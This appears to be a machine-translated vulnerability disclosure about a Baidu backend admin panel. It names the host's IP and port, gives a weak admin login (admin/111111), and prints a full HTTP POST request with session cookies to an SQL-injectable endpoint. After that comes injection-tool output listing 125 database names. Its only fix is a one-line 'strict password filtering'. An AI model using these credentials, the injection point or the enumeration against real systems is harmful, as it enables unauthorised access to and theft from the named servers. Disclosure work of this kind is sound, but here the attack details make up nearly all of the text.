A backend of Baidu has SQL Injection involving multiple databases.
Involving multiple databases
Http: // 111.13.112.18: 8080/
A weak password is found in the background in Section C of Baidu.
Account admin password 111111
An injection is found in the background.
POST/index. php? S =/admin/server/loadslavesrv.html & id = 242 HTTP/1.1
Host: 111.13.112.18: 8080
Proxy-Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q = 0.01
Origin: http: // 111.13.112.18: 8080
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Referer: http: // 111.13.112.18: 8080/index. php? S =/admin/index/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN, zh; q = 0.8
Cookie: PHPSESSID = soi7o2l1bplie1cbki4bbb6bd4; admin_username = admin; userid = 1
Web application technology: PHP 5.3.28
Back-end DBMS: MySQL 5.0.11
[17:28:49] [INFO] fetching database names
Available databases [125]:
[*] 0401_ad_x1_x34
[*] Ad_loginfo_x10_x18
[*] Ad_loginfo_x17_x18
[*] Ad_loginfo_x19_x22
[*] Ad_loginfo_x19_x27
[*] Ad_loginfo_xw.x18
[*] Ad_loginfo_xw.x27
[*] Ad_loginfo_xw.x31
[*] Ad_loginfo_xw.x34
[*] Ad_loginfo_x1_x9
[*] Ad_loginfo_x23_x24
[*] Ad_loginfo_x25_x27
[*] Ad_loginfo_x28_x29
[*] Ad_loginfo_x28_x31
[*] Ad_loginfo_x30_x31
[*] Ad_loginfo_x32_k1
[*] Ad_loginfo_x32_x34
[*] Ad_loginfo_x33_x34
[*] Ad_loginfo_x35_x38
[*] Ad_zone_x10_x18
[*] Ad_zone_x12_x14
[*] Ad_zone_x15_x16
[*] Ad_zone_x17_x18
[*] Ad_zone_x18
[*] Ad_zone_x19_x22
[*] Ad_zone_x19_x27
[*] Ad_zone_xw.x18
[*] Ad_zone_x1_x27
[*] Ad_zone_xw.x31
[*] Ad_zone_x0000x34
[*] Ad_zone_x1_x9
[*] Ad_zone_x23_x24
[*] Ad_zone_x24
[*] Ad_zone_x25_x27
[*] Ad_zone_x26
[*] Ad_zone_x27
[*] Ad_zone_x28_x29
[*] Ad_zone_x28_x31
[*] Ad_zone_x29
[*] Ad_zone_x30_x31
[*] Ad_zone_x31
[*] Ad_zone_x32_k1
[*] Ad_zone_x32_x34
[*] Ad_zone_x33_x34
[*] Ad_zone_x34
[*] Ad_zone_x35_x38
[*] Ad_zone_x36
[*] Ad_zone_x37
[*] Ad_zone_x38
[*] Ad_zone_x6_x9
[*] Dk_zone_k1
[*] Information_schema
[*] Ios_loginfo_s1_s4
[*] Ios_loginfo_t4
[*] Ios_loginfo_t5
[*] Ios_loginfo_x1_x23
[*] Ios_loginfo_x1_x46
[*] Ios_loginfo_x24_x37
[*] Ios_loginfo_x24_x40
[*] Ios_loginfo_x24_x46
[*] Ios_loginfo_x38_x40
[*] Ios_loginfo_x41_x46
[*] Ios_loginfo_x46
[*] Ios_loginfo_x47
[*] Ios_loginfo_x47_x49
[*] Ios_loginfo_x47_x53
[*] Ios_loginfo_x47_x61
[*] Ios_loginfo_x47_x63
[*] Ios_loginfo_x50_x53
[*] Ios_loginfo_x54_x55
[*] Ios_loginfo_x54_x58
[*] Ios_loginfo_x56_x57
[*] Ios_loginfo_x59_x61
[*] Ios_loginfo_x62_x63
[*] Ios_zone_s1_s4
[*] Ios_zone_s2_s4
[*] Ios_zone_t2
[*] Ios_zone_t3
[*] Ios_zone_t4
[*] Ios_zone_t6
[*] Ios_zone_x1_x23
[*] Ios_zone_xw.x46
[*] Ios_zone_x24_37
[*] Ios_zone_x24_x40
[*] Ios_zone_x24_x46
[*] Ios_zone_x34_x37
[*] Ios_zone_x38_x40
[*] Ios_zone_x39
[*] Ios_zone_x40
[*] Ios_zone_x41_x46
[*] Ios_zone_x42
[*] Ios_zone_x43
[*] Ios_zone_x44
[*] Ios_zone_x45
[*] Ios_zone_x46
[*] Ios_zone_x47_x49
[*] Ios_zone_x47_x53
[*] Ios_zone_x47_x61
[*] Ios_zone_x47_x63
[*] Ios_zone_x48
[*] Ios_zone_x49
[*] Ios_zone_x50_x53
[*] Ios_zone_x54_x55
[*] Ios_zone_x54_x58
[*] Ios_zone_x56_x57
[*] Ios_zone_x57
[*] Ios_zone_x58
[*] Ios_zone_x59_x61
[*] Ios_zone_x60
[*] Ios_zone_x61
[*] Ios_zone_x62_x63
[*] Ios_zone_x63
[*] Ios_zone_x8_x23
[*] Mergesrv
[*] Mysql
[*] Performance_schema
[*] Restore
[*] Td_loginfo_t1_t10
[*] Td_loginfo_t1_t6
[*] Td_loginfo_t7_t8
[*] Td_loginfo_t9_t10
[*] Td_zone_t1_t10
[*] Td_zone_t1_t6
[*] Td_zone_t7_t8
[*] Td_zone_t9_t10
Solution:
Strict Password Filtering